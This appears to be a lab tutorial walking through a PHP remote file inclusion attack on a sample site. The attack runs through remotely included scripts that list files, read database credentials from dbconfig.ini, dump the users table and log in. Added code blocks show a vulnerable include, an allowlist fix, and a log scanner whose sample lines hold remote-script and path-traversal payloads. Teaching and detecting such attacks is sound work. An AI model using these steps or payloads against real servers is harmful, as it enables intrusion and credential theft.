In this guide, we will perform a simple PHP remote file inclusion.
The goal of this exploit is to successfully log in to the website using credentials stored in the database.
Access to the login credentials will be gained by dumping the database content through remote file inclusion (remote code execution).

The badly programmed website includes any file that is supplied as the value of the phpfile parameter in the URL.

This exploit is made possible by bad programming practices and insecure server settings.

PHP is often used to load content dynamically based on parameters in the URL.
When a parameter is passed in a link, the server dynamically decides which content to load depending on the parameter value.
Instead of creating a static page for every possible value, the information is loaded dynamically according to the parameter value supplied with the link.

PHP Remote File Inclusion sample site

Vulnerable PHP code (no input filtering – the parameter value is passed directly to include). Vulnerable parameter name: phpfile
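The include pattern described above, written out as an added example (this is not the sample site's own code). The first function is the vulnerable shape the post describes; the second shows the usual fix: the request selects a key from a fixed allowlist, and the key is mapped to a file name on the server side, so no request data ever reaches include(). The function names, the page map and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example, not code from the original post.

// VULNERABLE: the request decides which file is included. With the php.ini
// setting allow_url_include=On, a URL in ?phpfile= is fetched from the remote
// host and executed locally. Even with it Off, a local path in the parameter
// still gets included, so the server setting alone is not the fix.
function vulnerableInclude(): void
{
    include $_GET['phpfile'];
}

// HARDENED: map the parameter onto a fixed set of pages. The parameter value
// is only ever used as an array key; the file name comes from this map.
// (Assumed page map and directory layout.)
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(?string $key): string
{
    // Unknown or missing key falls back to the default page instead of
    // touching anything the client supplied.
    if ($key === null || !array_key_exists($key, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$key];
}

function safeInclude(): void
{
    $file = resolvePage($_GET['phpfile'] ?? null);
    include __DIR__ . '/pages/' . $file;
}

// Server side, the matching hardening is to disable the stream wrappers for
// include in php.ini (settings that exist in PHP; values shown here are the
// recommended ones, not the sample site's configuration):
//   allow_url_include = Off
//   allow_url_fopen   = Off
```

The allowlist is what actually closes the hole; allow_url_include=Off only removes the remote variant while leaving local file inclusion in place.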

A remote file inclusion vulnerability can be tested for by supplying a remote URL as the value of the parameter.
The remote file inclusion is successful if a mixture of the original website and
the website behind the URL given as value to the vulnerable parameter is visible:

Mixed site content, remote file successfully included (website is vulnerable)
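From the defender's side, the test described above leaves a distinctive trace in the web server access log: a URL (or an encoded URL, or a traversal sequence) where a simple page name is expected. The following added example (not part of the original post) scans Common Log Format lines for such values in the phpfile parameter. The log lines are constructed for the example; the client and server addresses are the ones used in this guide, the timestamps are made up.

```php
<?php
// Added example, not code from the original post. Log lines are constructed.

const LOG_LINES = [
    '192.168.4.67 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?phpfile=home HTTP/1.1" 200 2048',
    '192.168.4.67 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?phpfile=http://192.168.4.67/cmd.txt HTTP/1.1" 200 512',
    '192.168.4.67 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?phpfile=http%3A%2F%2F192.168.4.67%2FdbTables.txt HTTP/1.1" 200 1300',
    '192.168.4.67 - - [01/Jan/2020:10:00:12 +0000] "GET /index.php?phpfile=../../dbconfig.ini HTTP/1.1" 200 300',
];

// A value that should never reach include(): any URL scheme (remote hosts as
// well as PHP stream wrappers such as php:// or data://), a path traversal
// sequence, or a NUL byte.
function isSuspiciousIncludeValue(string $value): bool
{
    // parse_str() already decodes once; decoding again also catches values
    // that were double-encoded to slip past naive filters.
    $decoded = rawurldecode($value);
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $decoded)) {
        return true;
    }
    return strpos($decoded, '..') !== false || strpos($decoded, "\0") !== false;
}

// Returns one entry per suspicious request: the client address and the raw
// parameter value, for alerting or further review.
function findInclusionAttempts(array $lines, string $param = 'phpfile'): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Common Log Format: <client> ... "<METHOD> <path?query> HTTP/x.y"
        if (!preg_match('/^(\S+) .*?"[A-Z]+ (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[2], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        parse_str($query, $params);
        if (isset($params[$param]) && is_string($params[$param])
            && isSuspiciousIncludeValue($params[$param])) {
            $hits[] = ['client' => $m[1], 'value' => $params[$param]];
        }
    }
    return $hits;
}

// Usage: the three non-"home" lines above are reported, the first is not.
foreach (findInclusionAttempts(LOG_LINES) as $hit) {
    printf("suspicious include from %s: %s\n", $hit['client'], $hit['value']);
}
```

On a real server this would run over the access log rather than an inline array; the scheme check is deliberately generic so that wrapper schemes are flagged alongside http:// and https://.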

PHP script to be included, supplied from the client side as the value of the phpfile parameter in the URL

Including the script as the value of the parameter (client IP: 192.168.4.67, server URL: 192.168.4.66).
Note that the script has to be uploaded somewhere reachable by the web server hosting the vulnerable website.
In this case it is hosted on another web server in the local network.
Remote inclusion of the cmd.txt script with the ‘dir’ command (lists folder contents):


PHP script to be included remotely (shows the tables in the database; it parses the dbconfig.ini stored on the vulnerable target web server for the SQL server login credentials):

PHP script code that runs the SHOW TABLES query

Remote inclusion URL and output of the dbTables.txt script (lists the existing tables of the database)

PHP script code that runs the SELECT * FROM users query

Remote inclusion of the dbSelectAllRows.txt script (lists all rows of the ‘users’ table)

Successful login on the vulnerable website using the stolen credentials